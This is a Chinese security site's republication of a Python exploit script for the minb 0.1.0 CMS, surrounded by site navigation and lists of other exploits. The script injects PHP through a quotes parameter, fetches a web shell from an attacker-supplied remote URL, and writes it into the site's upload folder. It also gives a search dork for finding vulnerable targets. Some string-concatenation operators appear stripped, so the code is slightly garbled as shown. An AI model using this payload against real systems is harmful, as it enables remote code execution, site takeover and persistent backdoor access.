• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > minb 0.1.0 Remote Code Execution Exploit

minb 0.1.0 Remote Code Execution Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了minb 0.1.0 Remote Code Execution Exploit ,其中包含minb,minb什么意思,execution,execution是什么意思,max execution time等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/python
#####################################################################################
#### minb Remote Code Execution Exploit ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Site : http://minb.sf.net #
# #
#Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2 #
# #
#DORK : Powered by minb #
# #
#####################################################################################
# [Note] #
# #
#All php file in this cms have this bug ;) #
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
import sys,urllib
if len(sys.argv)<3 :
print "minb Remote code Execution Exploit"
print "Powered by : R3d.W0rm"
print "www.IrCrash.com"
print "Usage : " sys.argv[0] " http://Target/path http://evil/shell.txt"
print "Ex. " sys.argv[0] " http://site.com/minb http://r3d.a20.ir/r.txt"
exit()
if 'http://' not in sys.argv[1] :
sys.argv[1]='http://' sys.argv[1]
if 'http://' not in sys.argv[2] :
sys.argv[2]='http://' sys.argv[2]
fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=";$s=fopen(\'' sys.argv[2] '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w \');fwrite($fp,$shell);fclose($fp);/*'})
urllib.urlopen(sys.argv[1] fp,data)
urllib.urlopen(sys.argv[1] fp)
test=urllib.urlopen(sys.argv[1] '/upload/pictures/r3d.w0rm.php').read()
if 'Not Found' not in test :
print "Shell Uploaded ."
print sys.argv[1] '/upload/pictures/r3d.w0rm.php'
exit()

</div>

您可能想查找下面的文章:

  • minb 0.1.0 Remote Code Execution Exploit

相关文章

  • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
  • Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
  • Maian Weblog
  • MyBulletinBoard (MyBB)
  • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
  • Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • Maian Search
  • WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
  • trixbox (langChoice) Local File Inclusion Exploit (connect-back)

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
    • IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)
    • phsBlog 0.2 Bypass SQL Injection Filtering Exploit
    • Maian Search
    • Bilboblog 2.1 Multiple Remote Vulnerabilities
    • BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
    • AuraCMS
    • HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit
    • iGaming CMS
    • Maian Cart 1.1 Insecure Cookie Handling Vulnerability

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有